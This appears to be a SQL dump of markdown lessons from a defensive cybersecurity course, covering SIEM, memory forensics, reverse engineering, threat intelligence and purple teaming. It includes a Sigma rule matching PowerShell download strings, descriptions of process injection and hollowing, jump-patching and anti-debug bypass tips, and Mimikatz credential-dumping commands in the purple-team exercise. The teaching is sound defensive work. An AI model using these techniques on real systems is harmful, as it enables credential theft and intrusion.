(Standard Deviation)\n*   Calculate the average daily outbound traffic for `Payroll_Server` over 30 days (`avg=50MB`, `stdev=10MB`).\n*   **Rule**: Alert if Today > `avg + (3 * stdev)`.\n*   (If today represents 80MB, that\'s 3 sigmas away—statistically extremely rare).\n*   *Advantage*: You don\'t need to know the *exact* number; the math finds the outlier for you.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(659, 364, '## Query Optimization: Speed is Survival\n\nIn a crisis, waiting 15 minutes for a search to complete is unacceptable. You must write efficient queries.\n\n### 1. The \"Left-to-Right\" Rule (Pipeline Processing)\nMost SIEMs process data in a pipeline. You want to filter the massive dataset **as early as possible** (on the left side).\n\n*   **Bad Splunk Query**:\n    `index=main | regex \"password\" | where status=200`\n    *   Why? The index contains 1 Billion events. It pulls ALL of them, runs a heavy Regex on ALL of them, and *then* checks status.\n*   **Good Splunk Query**:\n    `index=main status=200 \"password\"`\n    *   Why? It effectively uses the \"index\" to only retrieve events that already have `status=200` and the string \"password\". It might retrieve only 100 events.\n\n### 2. Avoid \"Leading Wildcards\"\n*   `index=main user=*bob`\n*   Why is this bad? The database is indexed alphabetically.\n    *   `abc`\n    *   `bob`\n    *   `zack`\n    *   If you search `bob*`, it jumps to \"B\" instantly.\n    *   If you search `*bob`, it must scan `abc`, `bob`, `zack`... literally every single word in the dictionary to see if it ends in \"bob\". It destroys CPU.\n\n### 3. Specify Time Ranges\n*   Never search \"All Time\".\n*   Always narrow down to \"Last 60 minutes\" or \"Specific Date Window\".\n\n### 4. Fast Mode vs. Verbose Mode\n*   **Fast Mode**: Returns only field summary/statistics. (Super fast).\n*   **Verbose Mode**: Returns every raw event text. (Slow).\n*   If you just need a count (`stats count`), use Fast Mode.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(660, 365, '## Building Detection-as-Code (DaC)\n\nThe old way: Click \"Create Rule\" in the GUI. Type stuff. Save.\nThe new way: Rules are logic. Logic is Code.\n\n### Why Code?\n1.  **Version Control (Git)**:\n    *   \"Who changed the Ransomware rule yesterday?\" -> Check Git Commit History.\n    *   \"The new rule broke the SIEM.\" -> `git revert`.\n2.  **Testing (CI/CD)**:\n    *   Before deploying a rule to Production, run it in a pipeline against a test dataset.\n    *   \"Does this rule trigger on this sample `malware.evtx`?\" (Unit Test).\n\n### Sigma: The Standard Format\n**Sigma** is a generic signature format for SIEMs (like Snort is for IDS). It is written in YAML.\n\n```yaml\ntitle: Suspicious PowerShell Download\nstatus: experimental\nlogsource:\n    product: windows\n    service: powershell\ndetection:\n    selection:\n        EventID: 4104\n        ScriptBlockText|contains:\n            - \'Net.WebClient\'\n            - \'DownloadString\'\n    condition: selection\nlevel: high\n```\n\n### The Workflow\n1.  Analyst writes triggers in Sigma (YAML).\n2.  Commits to GitHub.\n3.  **Sigmac** (Compiler) converts the YAML into:\n    *   Splunk SPL (`index=windows EventID=4104 ...`)\n    *   Elastic Query (Lucene)\n    *   Azure Sentinel (KQL)\n4.  Automation pushes the query to the SIEM API.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(661, 366, '## Module 36 Review\nAdvanced SIEM is Engineering.\n*   **Architecture**: How data flows.\n*   **RBA**: Reducing noise by scoring.\n*   **Optimization**: Writing fast queries.\n*   **DaC**: Managing rules via Git.\n\nNext: Digging into RAM with Memory Forensics.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 14:22:44'),
(662, 371, '## Why Memory Forensics?\n\nDisk Forensics is great, but it has limits.\n*   **Encryption**: If the disk is BitLocker encrypted and the computer is off, the data is gone.\n*   **Fileless Malware**: Some malware lives *only* in RAM. It never touches the hard drive. If you pull the plug, the evidence vanishes.\n*   **Rootkits**: Kernel-level rootkits can lie to the OS, but they cannot hide from memory analysis (mostly).\n\n### What lives in RAM?\nEverything the computer is thinking about *right now*.\n1.  **Running Processes** (and their injected DLLs).\n2.  **Network Connections** (Active sockets).\n3.  **Command History** (cmd.exe / powershell.exe buffers).\n4.  **Passwords/Keys**:\n    *   BitLocker keys.\n    *   Mimikatz output.\n    *   User passwords (sometimes in cleartext if poorly coded apps are running).\n5.  **Clipboard Contents**: What did the user just Copy/Paste?\n\n### The Principle of Exchange\nRAM is extremely volatile. Every second the computer is on, thousands of pages of memory are being overwritten. Speed is essential.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(663, 372, '## Memory Acquisition Techniques\n\nTaking a \"picture\" of RAM is trickier than disk.\n\n### 1. Hardware-Based Acquisition (DMA)\n*   **FireWire / Thunderbolt**: These ports have Direct Memory Access (DMA).\n*   **Method**: Plug in a specialized device. It can read RAM directly without the CPU even knowing.\n*   **Pros**: Undetectable by malware.\n*   **Cons**: Requires physical ports; modern OS protections (DMA Mapping) often block this.\n\n### 2. Software-Based Acquisition (Kernel Driver)\n*   **Method**: Run a tool (Administrator privileges required) that loads a Kernel Driver to read physical memory.\n*   **Tools**:\n    *   **WinPMEM**: Part of the Rekall framework.\n    *   **DumpIt**: Simple, one-click dumper.\n    *   **FTK Imager**: GUI-based.\n*   **Risk**: Loading a driver *changes* the memory you are trying to measure (Heisenberg Uncertainty Principle). It might trigger a Blue Screen of Death (BSOD) if the system is unstable.\n\n### 3. Virtual Machine Snapshots\n*   If the target is a VM (VMware/Hyper-V), you are lucky.\n*   **Method**: Just take a Snapshot \"with memory\".\n*   **File**: `.vmem` file. This is a perfect, uncorrupted copy of the RAM. No tools needed on the guest.\n\n### The Hyberfil.sys file\n*   When a laptop hibernates (sleeps), Windows writes the entire contents of RAM to `C:hiberfil.sys`.\n*   **Forensic Gold**: You can convert this file into a raw memory image and analyze it, even if the computer is currently off.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(664, 373, '## Volatility Framework Deep Dive\n\n**Volatility** is the industry-standard (Command Line) tool for analyzing memory dumps. It supports Windows, Linux, and Mac.\n\n### The Profile (Volatility 2 vs 3)\n*   **Volatility 2**: Required you to specify the \"Profile\" manually (e.g., `Win10x64_1909`). If you got it wrong, it output garbage.\n*   **Volatility 3**: Modern version. It detects the OS automatically using Symbol Tables.\n\n### Essential Commands (Plugins)\nAssuming you have a distinct memory image `mem.dmp`:\n\n1.  **pslist / psscan**: List processes.\n    *   `pslist`: Walks the \"Active Process Head\" (What Windows *admits* is running).\n    *   `psscan`: Scans raw memory bytes for EPROCESS structures. (Finds \"Hidden\" processes that unlinked themselves from the list).\n    *   *Comparison*: If a PID shows up in `psscan` but NOT `pslist`, it is a **Rootkit**.\n2.  **netscan**: List network connections.\n    *   Shows Protocol, Local IP, Remote IP, State (ESTABLISHED), and PID.\n    *   \"Why is `notepad.exe` connected to Russia on Port 4444?\"\n3.  **malfind**: Detects code injection.\n    *   It looks for memory pages that are:\n        *   Executable (RWX permissions).\n        *   Start with `MZ` header (Executable file) OR generic Shellcode patterns.\n    *   Output: Hex dump of the injection.\n4.  **dlllist**: List loaded DLLs for a process.\n    *   \"Why does `svchost.exe` have `cryptominer.dll` loaded?\"\n5.  **cmdline**: Shows the command line arguments.\n    *   `powershell.exe -w hidden -enc JABz...` (Base64 encoded evil script).\n\n### Workflow\n1.  Identify rogue networking (`netscan`). -> Found PID 1234.\n2.  Investigate process (`pslist`). -> PID 1234 is `svchost.exe`.\n3.  Check parent (`pstree`). -> Parent is `explorer.exe`. (BAD. `svchost` should come from `services.exe`).\n4.  Check injection (`malfind -p 1234`). -> Found RWX memory segment.\n5.  Dump the malware (`procdump -p 1234`). -> Save to disk for Reverse Engineering.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(665, 374, '## Process Analysis & Injection Detection\n\nMalware rarely runs as `virus.exe`. It hides inside legitimate processes. This is **Process Injection**.\n\n### 1. DLL Injection\n*   **Concept**: Force a legitimate process (e.g., Chrome) to load a malicious DLL.\n*   **Mechanism**:\n    1.  Malware runs.\n    2.  Allocates memory in Chrome (VirtualAllocEx).\n    3.  Writes path to evil DLL (WriteProcessMemory).\n    4.  CreateRemoteThread starting at LoadLibrary(\"evil.dll\").\n*   **Result**: The malware code runs *inside* Chrome\'s memory space. Firewalls allow Chrome.\n\n### 2. Process Hollowing (RunPE)\n*   **Concept**: A zombie suit.\n*   **Mechanism**:\n    1.  Start a legitimate process (e.g., `svchost.exe`) in \"Suspended Mode\".\n    2.  Unmap (Hollow out) the legitimate code from memory.\n    3.  Write the malware code into that empty space.\n    4.  Resume the thread.\n*   **Result**: Task Manager says \"svchost.exe\". The Hash on disk is clean (Microsoft signed). But the memory is pure malware.\n*   **Detection**: **Volatility `malfind`** spots this mismatch between the file on disk (VAD) and the content in RAM.\n\n### 3. Reflective DLL Injection\n*   Loading a DLL directly from memory without it ever touching the disk.\n*   Extremely hard to detect with traditional AV.\n*   Used heavily by tools like **Cobalt Strike** and **Metasploit** (Meterpreter).\n\n### 4. Atom Bombing / Propagate\n*   Using obscure Windows API mechanisms (Atom Tables, GUI Event Hooks) to trigger code execution in other processes without using the noisy \"CreateRemoteThread\" call.\n\n### The Analyst\'s Eye\nIn Memory Forensics, you look for **Inconsistencies**.\n*   The PEB (Process Environment Block) says the path is `C:WindowsSystem32svchost.exe`.\n*   The VAD (Virtual Address Descriptor) says the memory map is Private Commit (not maximizing a file).\n*   This discrepancy confirms Hollowing.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(666, 375, '## Hunting Rootkits & Hidden Processes\n\n**Rootkits** are the ninjas of malware. They modify the Kernel (Ring 0) to intercept the reality presented to the OS.\n\n### Direct Kernel Object Manipulation (DKOM)\n*   Windows keeps a list of processes in a Doubly Linked List (ActiveProcessLinks).\n*   Task Manager iterates this list to show you what runs.\n*   **The Attack**: A Rootkit simply \"unlinks\" its process node from the list.\n    *   Previous -> Next.\n    *   It literally disconnects itself.\n    *   The OS still schedules CPU time for it (because the Scheduler uses a different list), so it runs. But tools (TaskMgr, Sysinternals) that rely on the API list cannot see it.\n\n### Hunting with Cross-View Analysis\nThe technique of comparing different \"views\" of the system to find lies.\n*   **View 1**: The API List (`pslist`). (Modified by Rootkit).\n*   **View 2**: The Scheduler / Thread List (`thrdscan`). (Harder to modify without crashing).\n*   **View 3**: CSRSS Handles (`handles`).\n*   **Method**: `psscan` (Volatility) scans the raw physical RAM for structures that *look* like processes (EPROCESS blocks).\n    *   If `psscan` finds it, but `pslist` misses it -> **Rootkit Confirmed**.\n\n### Hooks (SSDT Hooking)\n*   **SSDT (System Service Descriptor Table)**: The map of System Calls.\n*   **Attack**: Malicious driver overwrites the address of `NtQuanryDirectoryFile`.\n    *   Original: Points to `ntoskrnl.exe`.\n    *   Hooked: Points to `evil_rootkit.sys`.\n*   When you ask for a file list, the Rootkit code runs first, filters the results, and then passes the request to the real Kernel.\n*   **Detection**: **`ssdt`** plugin in Volatility checks if any function pointer points outside the valid Kernel memory range.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(667, 376, '## Module 37 Review\nMemory Forensics is the ultimate truth.\n*   **Volatility**: The tool.\n*   **Injection**: Looking for RWX pages (`malfind`).\n*   **Rootkits**: Using Cross-View analysis (`pslist` vs `psscan`) to find hidden threats.\n\nNext: Reverse Engineering (Understanding the code itself).', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 14:22:44'),
(668, 381, '## RE Fundamentals: The Art of Dissection\n\n**Reverse Engineering (RE)** is taking apart a system to understand how it works. In malware analysis, it means turning a compiled binary (`.exe`) back into readable logic (Assembly/C).\n\n### Compiled vs. Interpreted\n*   **Interpreted (Python/JS)**: You receive the source code. Analysis is just \"reading\".\n*   **Compiled (C/C++/Go)**: The source code is translated into **Machine Code** (0s and 1s) by a compiler. You cannot see variable names or comments.\n\n### The Tools of the Trade\n1.  **Disassembler**: Translates Machine Code (Hex) into **Assembly Language** (ASM).\n    *   *Tool*: IDA Pro, Ghidra (Free, by NSA).\n    *   *Output*: `MOV EAX, 1` (Move 1 into Register EAX).\n2.  **Decompiler**: Attempts to translate ASM back into pseudo-C code.\n    *   *Tool*: Ghidra, Hex-Rays.\n    *   *Output*: `if (variable1 == 1) { download_virus(); }`\n    *   *Note*: It is never 100% accurate, but it is much easier to read than ASM.\n3.  **Debugger**: Runs the code step-by-step (Dynamic).\n    *   *Tool*: x64dbg (Windows), GDB (Linux).\n    *   *Action*: \"Pause execution right before it encrypts the file so I can see the key in memory.\"\n\n### The Goal of RE\nYou are not trying to re-write the source code. You are trying to answer specific questions:\n1.  Does it contain a Domain Generation Algorithm (DGA)?\n2.  What is the hardcoded C2 IP?\n3.  How does it bypass the Anti-Virus?', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(669, 382, '## x86/x64 Assembly Essentials\n\nYou don\'t need to write Assembly, but you must read it.\n\n### Registers (The CPU\'s pockets)\nThe CPU has small storage slots called Registers.\n*   **EAX / RAX**: The \"Accumulator\". Used for math and **Return Values**. (If a function returns \"Success\", EAX is usually 1 or 0).\n*   **EBX / RBX**: Base.\n*   **ECX / RCX**: Counter. Used in loops.\n*   **EDX / RDX**: Data.\n*   **EIP / RIP**: **Instruction Pointer**. This is the most important register. It points to the *next instruction* the CPU will execute.\n    *   *Buffer Overflow*: If you can overwrite EIP, you control the CPU.\n*   **ESP / RSP**: Stack Pointer. Points to the top of the stack.\n\n### Common Instructions\n1.  **MOV destination, source**: Copy data.\n    *   `MOV EAX, 5` -> Put 5 into EAX.\n2.  **ADD / SUB**: Math.\n3.  **CMP A, B**: Compare A and B.\n4.  **JMP / JZ / JNZ** (Jumps): The logic flow (If statements).\n    *   `CMP EAX, 0` (Check if EAX is 0)\n    *   `JZ 402000` (Jump if Zero to memory address 402000).\n    *   *Hacking Tip*: If you change `JZ` (Jump if Zero) to `JNZ` (Jump if NOT Zero), you can flip the logic of the program. (e.g., \"Is Password Correct?\" -> \"No\" -> \"Login Anyway\").\n\n### The Stack (LIFO)\nTemporary memory for functions.\n*   **PUSH**: Put something on top of the stack.\n*   **POP**: Take it off.\n*   Think of it like a stack of plates.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(670, 383, '## Static Analysis with Ghidra\n\n**Ghidra** is the NSA\'s gift to the community. It is a powerful, free Disassembler/Decompiler.\n\n### The Interface\n1.  **Program Tree**: Sections of the file (.text, .data, .rsrc).\n2.  **Listing View**: The Assembly code (linear view).\n3.  **Decompiler View**: The C-like pseudo-code. **(This is where you live)**.\n4.  **Symbol Tree**: List of Functions and Imports.\n\n### The Workflow\n1.  **Import**: Drag and Drop the malware.\n2.  **Analyze**: Run the auto-analysis (identifies functions, strings).\n3.  **Search Strings**: Find \"http\". Double click it.\n4.  **X-Ref (Cross Reference)**: Right-Click the string -> \"References\".\n    *   This shows *where in the code* that string is used.\n    *   Clicking it takes you to the `Main()` function that calls the C2.\n5.  **Rename**: Ghidra names variables `DAT_12345` or `FUN_401000`.\n    *   Your job is to read the logic.\n    *   \"This function takes a URL and downloads a file.\" -> Press `L`. Rename to `Download_File`.\n    *   \"This variable holds the IP.\" -> Rename to `C2_IP`.\n    *   Slowly, the code becomes readable.\n\n### Graph View\nVisualizes the flow control.\n*   Boxes are blocks of code.\n*   Arrows are Jumps (Green for Yes, Red for No).\n*   If you see a complex knot of arrows, it\'s a loop.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(671, 384, '## Debugging with x64dbg\n\nStatic analysis is hard when the code is obfuscated. A **Debugger** lets you run it and watch.\n\n### Key Concepts\n1.  **Breakpoints (BP)**: Trapwires using Software Interrupts (INT 3).\n    *   You tell the debugger: \"Run until you hit address 401050, then PAUSE.\"\n    *   *Use*: Put a BP on `CreateFileW`. The malware will run until it tries to create a file, then freeze. You can then look at the stack to see *filename* it is trying to write.\n2.  **Stepping**:\n    *   **Step Into (F7)**: Go inside the function call.\n    *   **Step Over (F8)**: Run the function and pause after it returns. (Use this to skip boring library functions like `printf`).\n3.  **Register/Memory View**:\n    *   Watch the EAX register change as you step.\n    *   Watch the memory dump to see encrypted strings suddenly become decrypted.\n\n### Patching\nYou can modify the binary in memory.\n*   **Scenario**: The malware checks `If (Year == 2023)`. It is 2025, so it quits.\n*   **Fix**:\n    1.  Find the `CMP Year, 2023` and `JNE Exit` instructions.\n    2.  Change the `JNE` (Jump Not Equal) to `NOP` (No Operation - Do nothing).\n    3.  The malware continues running.\n\n### Anti-Debugging\nMalware hates debuggers.\n*   **IsDebuggerPresent()**: A Windows API function that returns 1 if being debugged.\n*   **RDTSC**: Read Time Stamp Counter. Measures CPU cycles.\n    *   \"It took 5,000,000 cycles to run this instruction. Humans are slow. A debugger must be attached.\" -> *Self Destruct*.\n*   **Bypass**: Use plugins like **ScyllaHide** to hide your debugger from these checks.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(672, 385, '## Unpacking & Anti-Analysis\n\nMost malware is \"Packed\" (Compressed/Encrypted) to hide from AV signatures.\n\n### The Packer Lifecycle\n1.  **The Stub**: The small piece of code you actually see.\n2.  **Unpacking**: The Stub decrypts the *real* malware (Payload) from its data section and writes it into memory.\n    *   *Technique*: Uses `VirtualAlloc` (Get memory) -> `RtlDecompressBuffer` -> `VirtualProtect` (Make executable).\n3.  **Transfer (OEP)**: The Stub jumps to the **Original Entry Point** (OEP) of the payload.\n4.  **Execution**: The real malware runs.\n\n### Manual Unpacking Technique\n1.  Load packed malware into x64dbg.\n2.  Set breakpoints on `VirtualAlloc` and `VirtualProtect`.\n3.  Run code. It breaks when it allocates memory.\n4.  Watch that memory region. Step over until you see the PE Header (`MZ`) appear in the memory dump.\n5.  **Dump It**: Use \"Scylla\" (plugin) to save that memory region to a file (`unpacked.exe`).\n6.  Now open `unpacked.exe` in Ghidra. You will see the real strings and logic.\n\n### Dealing with Obfuscation\n*   **Dead Code**: Junk instructions that do nothing (`ADD EAX, 0`) just to confuse you.\n*   **Control Flow Flattening**: Breaking linear code into a confusing switch-statement mess.\n*   **String Encryption**: Strings are stored as `XOR 0x55`. The malware decrypts them only when needed.\n*   *Solution*: FLOSS (FireEye Labs Obfuscated String Solver). It runs code heuristics to find and extract obfuscated strings automatically.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(673, 386, '## Module 38 Review\nReverse Engineering is the deepest level of analysis.\n*   **Assembly**: The language of the CPU.\n*   **Ghidra**: The static map.\n*   **x64dbg**: The dynamic probe.\n*   **Unpacking**: Removing the armor to see the code.\n\nNext: Applying this knowledge to Threat Intelligence.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 14:22:44'),
(674, 391, '## The Threat Intel Lifecycle\n\nThreat Intelligence (CTI) is knowledge about adversaries. It moves security from \"What is hitting me?\" to \"Who is hitting me and why?\"\n\n### The Lifecycle\n1.  **Planning & Direction**: The \"Requirements\".\n    *   \"We are a Bank. We care about Fin7 (Credit Card thieves). We don\'t care about APTs targeting Aerospace.\"\n2.  **Collection**: Gathering raw data.\n    *   Open Source (OSINT): Twitter, GitHub, Blogs.\n    *   Closed Source: Vendor feeds (CrowdStrike, Mandiant), Deep Web forums.\n    *   Technical: HoneyPots, Malware Sandboxes.\n3.  **Processing**: Cleaning and normalizing.\n    *   Converting a PDF report into a list of IPs (STIX format).\n4.  **Analysis**: Making sense of it.\n    *   \"This new IP belongs to the same subnet used by Lazarus Group last year. It implies Lazarus is back.\"\n5.  **Dissemination**: Sending it to the right people.\n    *   **Strategic**: To the CISO (\"Risk is elevated\").\n    *   **Tactical**: To the SOC (\"Block these IPs\").\n6.  **Feedback**: \"Was this useful?\"\n\n### Types of CTI\n*   **Strategic**: High-level trends for Executives. (\"Ransomware is up 200%\").\n*   **Operational**: TTPs for Hunters. (\"They use PowerShell Empire\").\n*   **Tactical**: IOCs for SIEMs. (Hashes, IPs).', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(675, 392, '## Collection & Sources (OSINT vs. INT)\n\nWhere do we get the dirt?\n\n### OSINT (Open Source Intelligence)\n*   **Twitter (InfoSec Twitter)**: Often the fastest source. Researchers post \"I just found this C2\" minutes after detection.\n*   **VirusTotal**: The world\'s malware database.\n    *   *Hunting*: \"Search for all files that communicate with `bad-domain.com`.\"\n*   **Shodan/Censys**: Search engines for the Internet of Things.\n    *   \"Show me all servers running vulnerable Exchange 2016 in Germany.\"\n*   **AlienVault OTX (Open Threat Exchange)**: Crowd-sourced pulses.\n\n### Paid Feeds (Commercial)\n*   Companies like Recorded Future, Mandiant, Proofpoint.\n*   They have spies in Dark Web forums.\n*   Value: **Context**. Not just \"Block IP X\", but \"IP X is a Cobalt Strike server rented by Ryuk Ransomware affiliates.\"\n\n### ISACs (Information Sharing and Analysis Centers)\n*   Industry groups (FS-ISAC for Finance, H-ISAC for Health).\n*   \"We (Bank A) got hit by this. Here are the IOCs so you (Bank B) can block it.\"\n*   *Trust*: High.\n\n### Dark Web (Tor)\n*   Monitoring Ransomware leak sites.\n*   \"Company X has 2 days to pay.\" -> If Company X is your vendor, you have a Third-Party Risk problem.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(676, 393, '## Analysis & Attribution: The \"Who\"\n\nAttribution (Naming the actor) is hard and often political.\n\n### Levels of Attribution\n1.  **Infrastructure**: \"This attack came from IP 1.2.3.4 (DigitalOcean VPN).\" (Low value).\n2.  **Tooling**: \"They used \'PoisonIvy\', which is often used by Chinese groups.\" (Medium).\n3.  **TTPs**: \"They used the exact same 5-step process as APT10.\" (High).\n4.  **Strategic**: \"The attack targeted a dissident journalist critical of Country X.\" (Motivation).\n\n### The Diamond Model of Intrusion Analysis\nA simple shape to map attacks.\n1.  **Adversary**: Who? (Russia).\n2.  **Infrastructure**: What? (IPs/Domains).\n3.  **Capability**: How? (Malware/Exploits).\n4.  **Victim**: Whom? (You).\n*   *Pivot*: If you find a Malware sample (Capability) used by an Adversary, you can pivot to find their Infrastructure.\n\n### Cognitive Biases\nAnalysts must avoid traps.\n*   **Confirmation Bias**: Looking for evidence that supports your theory (\"It\'s Russia\") and ignoring evidence that contradicts it.\n*   **Mirror Imaging**: Assuming the attacker thinks like you. (\"They wouldn\'t attack on Christmas.\" Yes, they would).\n*   **False Flag**: Attackers verify sophisticated. The \"Olympic Destroyer\" malware (Russia) contained code snippets from North Korea to confuse analysts.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(677, 394, '## STIX/TAXII & Sharing\n\nWe need a standard language to share Intel between machines.\n\n### STIX (Structured Threat Information Expression)\nA JSON format for describing threats.\n*   **Objects**:\n    *   `Threat Actor`: The bad guy.\n    *   `Attack Pattern`: The TTP (CAPEC/ATT&CK).\n    *   `Indicator`: The Regex/Rule to find it.\n    *   `Observed Data`: The IP/Hash.\n*   *Example*: \"Actor A (STIX) uses Malware B (STIX) which connects to IP C (STIX).\"\n\n### TAXII (Trusted Automated Exchange of Intelligence Information)\nThe transport protocol (HTTPS API) to move STIX objects.\n*   **Server**: Host the feed (e.g., Anomali Limo).\n*   **Client**: Your SIEM polls the server.\n*   \"Hey Server, give me all new High-Confidence Ransomware IPs since yesterday.\"\n*   Server responds with STIX JSON.\n\n### MISP (Malware Information Sharing Platform)\nThe most popular Open Source Threat Intel Platform (TIP).\n*   Org A puts malware data into MISP.\n*   Org B\'s MISP syncs with Org A.\n*   Your SIEM connects to MISP and downloads the blocklist automatically.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(678, 395, '## Operationalizing Intel\n\nIntel is useless if it sits in a PDF. It must \"Drive Operations\".\n\n### 1. Alert Enrichment (Context)\n*   **Without Intel**: SIEM Alert \"Connection to 1.2.3.4\". Priority: Unknown.\n*   **With Intel**: SIEM Alert \"Connection to 1.2.3.4 (Known Conti Ransomware Node)\". Priority: **CRITICAL**.\n*   *How*: Connect your SIEM to a TIP.\n\n### 2. Retroactive Hunting\n*   Intel Report: \"In Jan 2024, Actor X used `evil.com`.\"\n*   Today is March 2024. Blocking it now helps, but...\n*   **Action**: Search your *Historical Logs* (Cold Storage). Did anyone talk to `evil.com` back in January?\n    *   If Yes: You have been compromised for 3 months. **Incident Response Start**.\n\n### 3. Vulnerability Prioritization\n*   Scanner says: \"You have 10,000 unpatched bugs.\"\n*   Intel says: \"Only CVE-2023-1234 is being actively exploited in the wild by Ransomware.\"\n*   **Action**: Patch CVE-2023-1234 *tonight*. The rest can wait.\n\n### 4. TTP-Based Defense\n*   Intel says: \"Lazarus is using LNK files in ZIP Archives.\"\n*   **Action**: Update Email Gateway to block `.lnk` attachments. Update EDR to alert on `cmd.exe` spawned from `explorer.exe` via LNK.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(679, 396, '## Module 39 Review\nThreat Intel gives you the \"Heads Up\".\n*   **Lifecycle**: Planning to Feedback.\n*   **Standards**: STIX (Language) / TAXII (Truck).\n*   **Attribution**: The Diamond Model.\n\nNext: Testing your defenses with Red and Purple Teams.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 14:23:36'),
(680, 401, '## Red, Blue, and Purple Teams\n\nThe color spectrum of information security.\n\n### Red Team (The Offensive)\n*   **Goal**: Simulate a real adversary to test defenses.\n*   **Mindset**: \"There is always a way in.\"\n*   **Method**: Zero-day exploits, Phishing, Social Engineering, Physical Intrusion.\n*   **Outcome**: A report saying \"We stole the Domain Admin password in 4 hours.\"\n\n### Blue Team (The Defensive)\n*   **Goal**: Detect and Respond.\n*   **Mindset**: \"Protect the Crown Jewels.\"\n*   **Method**: SIEM, EDR, Firewalls, Patching, Threat Hunting.\n*   **Outcome**: \"We blocked the Phishing email. We detected the scanner.\"\n\n### Purple Team (The Collaborative)\n*   **The Problem**: Red Teams and Blue Teams often hate each other.\n    *   Red: \"Blue team is useless, I pawned them easily.\"\n    *   Blue: \"Red team cheated, they used a vulnerability for a system we don\'t own.\"\n    *   *Result*: No learning happens.\n*   **The Solution**: Purple Teaming.\n    *   Red Team executes an attack (T1059 PowerShell).\n    *   Blue Team watches *in real-time*.\n    *   Red: \"Did you see that?\"\n    *   Blue: \"No.\"\n    *   Red: \"Okay, I will run it again. Tune your SIEM to look for X.\"\n    *   Blue: \"Got it! Alert triggered.\"\n\n### Why Purple is the Future\nIt moves from \"Win/Lose\" to \"Improvement\". The goal isn\'t to hack the company; the goal is to verify the detection logic.', 'markdown', 20, '2025-12-27 02:22:23', '2025-12-29 16:15:02'),
(681, 402, '## Red Team Operations\n\nRed Teaming is not just \"Running Nmap\". It is a full-scope simulation.\n\n### 1. Reconnaissance (OSINT)\n*   Scraping LinkedIn to find system admins.\n*   Looking for leaked credentials on the Dark Web.\n*   Mapping external IP ranges (Shodan).\n\n### 2. Weaponization & Delivery\n*   Creating custom malware (avoiding signature detection).\n*   Buying a look-alike domain (`cornpany.com`).\n*   Sending the Spearphishing email.\n\n### 3. Exploitation & Install\n*   User clicks link.\n*   Browser exploit runs.\n*   Beacon (C2) installed.\n\n### 4. Privilege Escalation\n*   Local Admin -> Domain Admin.\n*   Techniques: Kerberoasting, PrintNightmare.\n\n### 5. Lateral Movement\n*   Moving from \"Bob from Accounting\" to the \"Swift Payment Server\".\n\n### 6. Actions on Objectives\n*   Stealing the money. Encrypting the drive.\n\n### Rules of Engagement (ROE)\nA legal contract defining what Red Team is allowed to do.\n*   **Limits**: \"Do not attack the Production Database.\" \"Do not phish the CEO.\"\n*   **Emergency Contact**: If Red Team accidentally crashes a server, who do they call at 3 AM?', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(682, 403, '## Blue Team Defense\n\nThe Blue Team has the harder job. The Red Team only needs to be right *once*. The Blue Team needs to be right *every time*.\n\n### 1. Prevention (Hardening)\n*   \"Reduce the attack surface.\"\n*   Disable macros.\n*   Patch vulnerabilities.\n*   Enforce MFA.\n\n### 2. Detection (Monitoring)\n*   SIEM rules.\n*   Honeypots (Traps).\n*   Canary Tokens (Fake files that alert when opened).\n\n### 3. Response (IR)\n*   The fire brigade.\n\n### The \"Assume Breach\" Mentality\nModern Blue Teams assume the perimeter has failed. They focus on **Internal Monitoring**.\n*   \"I don\'t care if they get in. I care if they can move to the database without me seeing them.\"', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(683, 404, '## Purple Team Exercises\n\nA structured Purple Team exercise follows a script.\n\n### Phase 1: Planning\n*   **Objective**: \"Verify detection of Credential Dumping (T1003).\"\n*   **Tool**: Mimikatz.\n*   **Target**: Test Workstation A.\n\n### Phase 2: Execution (Round 1)\n*   Red: Runs `mimikatz.exe privilege::debug`.\n*   Blue: Checks SIEM. \"No Alert.\"\n*   Red: \"Okay, running `sekurlsa::logonpasswords`.\"\n*   Blue: \"No Alert.\"\n\n### Phase 3: Tuning\n*   Blue: \"Why did we miss it?\"\n    *   Investigation: \"We don\'t ingest Sysmon Event ID 10 (Process Access).\"\n*   **Fix**: Enable Sysmon config. Forward logs to Splunk. Write Search.\n\n### Phase 4: Execution (Round 2)\n*   Red: Runs `mimikatz.exe`.\n*   Blue: \"ALERT! Critical Severity - Credential Dumping detected.\"\n*   **Verdict**: Success.\n\n### Phase 5: Reporting\n*   \"We improved detection coverage for T1003 from 0% to 100%.\"', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
